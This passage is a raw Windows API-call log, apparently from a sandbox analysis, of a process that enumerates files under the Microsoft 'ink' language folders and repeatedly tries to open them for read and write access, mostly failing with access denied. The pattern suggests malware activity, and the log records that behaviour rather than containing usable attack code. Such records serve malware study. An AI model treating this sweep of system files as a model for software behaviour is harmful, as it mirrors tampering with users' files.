(in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.079] CloseHandle (hObject=0x42c) returned 1 [0082.079] AreFileApisANSI () returned 1 [0082.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0082.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e3e8 [0082.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e3e8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 63 [0082.079] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.080] GetLastError () returned 0x5 [0082.080] GetLastError () returned 0x5 [0082.080] SetLastError (dwErrCode=0x5) [0082.080] GetLastError () returned 0x5 [0082.080] SetLastError (dwErrCode=0x5) [0082.080] GetLastError () returned 0x5 [0082.080] SetLastError (dwErrCode=0x5) [0082.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0082.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.080] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0554b83, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0082.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0082.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0082.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0082.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0082.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0082.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0082.080] AreFileApisANSI () returned 1 [0082.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ", lpUsedDefaultChar=0x0) returned 57 [0082.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0082.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0082.081] AreFileApisANSI () returned 1 [0082.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69e30 [0082.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ") returned 57 [0082.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.081] GetLastError () returned 0x5 [0082.081] GetLastError () returned 0x5 [0082.081] SetLastError (dwErrCode=0x5) [0082.081] GetLastError () returned 0x5 [0082.081] SetLastError (dwErrCode=0x5) [0082.081] GetLastError () returned 0x5 [0082.081] SetLastError (dwErrCode=0x5) [0082.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0082.081] AreFileApisANSI () returned 1 [0082.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0082.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ") returned 57 [0082.082] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.082] GetLastError () returned 0x5 [0082.082] GetLastError () returned 0x5 [0082.082] SetLastError (dwErrCode=0x5) [0082.082] GetLastError () returned 0x5 [0082.082] SetLastError (dwErrCode=0x5) [0082.082] GetLastError () returned 0x5 [0082.082] SetLastError (dwErrCode=0x5) [0082.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0082.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0082.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0082.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0082.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0082.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0082.082] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0082.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0082.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0082.082] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78690 [0082.082] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0554b83, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.083] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e316e09, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e316e09, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e316e09, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x51398 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0082.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.084] AreFileApisANSI () returned 1 [0082.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0082.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.084] AreFileApisANSI () returned 1 [0082.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0082.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 73 [0082.084] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.084] GetFileType (hFile=0x430) returned 0x1 [0082.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0082.084] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.085] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.085] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.085] CloseHandle (hObject=0x430) returned 1 [0082.085] AreFileApisANSI () returned 1 [0082.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0082.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 73 [0082.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.085] GetLastError () returned 0x5 [0082.085] GetLastError () returned 0x5 [0082.085] SetLastError (dwErrCode=0x5) [0082.085] GetLastError () returned 0x5 [0082.085] SetLastError (dwErrCode=0x5) [0082.085] GetLastError () returned 0x5 [0082.085] SetLastError (dwErrCode=0x5) [0082.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0082.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0082.086] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.086] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.086] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓☀")) returned 0 [0082.086] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0082.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0082.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0082.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0082.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0082.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.087] AreFileApisANSI () returned 1 [0082.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK", lpUsedDefaultChar=0x0) returned 57 [0082.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.088] AreFileApisANSI () returned 1 [0082.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) 